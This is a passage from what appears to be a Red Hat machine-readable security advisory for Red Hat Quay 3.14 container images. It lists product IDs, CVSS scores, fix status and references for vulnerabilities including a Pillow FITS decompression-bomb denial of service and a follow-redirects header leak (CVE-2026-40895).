            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
    },
    {
      "cve": "CVE-2026-40895",
      "cwe": {
        "id": "CWE-212",
        "name": "Improper Removal of Sensitive Information Before Storage or Transfer"
      },
      "discovery_date": "2026-04-21T21:02:33.280553+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2460297"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in follow-redirects. When an HTTP request follows a cross-domain redirect (a redirection to a different domain), custom authentication headers, such as X-API-Key or X-Auth-Token, are not properly stripped. This allows these sensitive headers to be forwarded verbatim to the redirect target, potentially leading to the unintended disclosure of authentication information to an untrusted third party.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "RHBZ#2460297",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460297"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40895",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653",
          "url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653"
        }
      ],
      "release_date": "2026-04-21T19:59:59.759000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects"
    },
    {
      "cve": "CVE-2026-42033",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:20.937507+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
